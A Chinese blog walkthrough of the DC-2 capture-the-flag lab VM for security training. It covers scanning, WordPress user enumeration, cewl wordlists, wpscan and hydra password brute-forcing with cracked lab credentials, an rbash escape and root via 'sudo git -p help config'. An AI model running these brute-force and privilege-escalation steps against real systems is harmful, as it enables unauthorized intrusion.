DC-2靶机复现

一、主机扫描

1.使用 arp-scan -l 命令探测网段中的存活主机:

image

192.168.11.130 为DC-2靶机的IP地址。

2.端口探测

nmap -A -p 1-65535 192.168.11.130

image

发现80端口和ssh的7744端口。

二、信息收集

1.访问80端口

image

发现访问失败,搜索栏返回dc-2的域名,将其添加到hosts文件中:

image

访问成功:

image

查看Wappalyzer发现的是 Wordpress 4.7.10 :

image

查看网站后发现flag1:

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
你通常的词表可能不起作用,所以相反,也许你只需要cewl。
密码越多越好,但有时您就是无法全部赢。
以一个人身份登录以查看下一个flag。
如果找不到,请以另一个身份登录。
(此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。)

2.目录扫描

可以使用kali中的dirb或nikto命令进行目录扫描

dirb http://dc-2/

image

nikto -h dc-2

image

访问一下发现的目录:

image

发现管理系统的登录界面,前面发现是Wordpress网站可以使用wpscan工具进行攻击。

三、漏洞攻击

1.wpscan(Wordpress的专用扫描器)扫描Wordpress网站

image

wpscan --url http://de-2/ -e u 进行扫描:

image

发现三个用户,保存到文件(user.txt)。

2.利用Cewl爬取密码

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

image

默认使用方式: cewl url

cewl dc-2 -w pass.txt (使用cewl生成密码保存在文件pass.txt中)

image

3.使用wpscan进行暴力破解

现在用户名和密码都有了,开始尝试暴力破解,

wpscan --url http://dc-2/ -U user.txt -P pass.txt

image

发现获得了jerry和tom的用户信息:

jerry / adipiscing
tom / parturient

4.利用jerry进入后台管理系统,简单查看系统后发现flag2

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个切入点。

根据提示可以利用ssh的7744端口进行连接

5.利用hydra爆破7744端口:

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt 192.168.11.130 ssh -s 7744

image

使用ssh登录:

image

四、提权

1.rbash绕过

发现cat指令用不了,vi可以使用,发现flag3

image

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追着杰瑞。 也许他应该为他造成的所有压力而苏醒。

意思大概是切换成jerry账户,关于rbash绕过:

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/

image

用su命令切换成jerry账号:

image

image

发现flag4.txt

Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!).  
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!
很高兴看到你已经走到了这一步 - 但你还没有回家。
您仍然需要获得最终flag(唯一真正重要的flag!!!)。
这里没有提示——你现在靠自己了。 :-)
继续 - git outta here!!!!

2.git提权

根据提示大概在git上,查看git的配置:(两种方法)

git help [Option] 	sudo git -p help config
git [Option] --help 	sudo git -p config --help

使用命令sudo git -p help config

image

输入!, :就自动变成了! 再输入/bin/bash完成提权

image

最后找到final-flag

image

完成!

posted @ 2021-11-25 15:04  sainet  阅读(229)  评论(0编辑  收藏  举报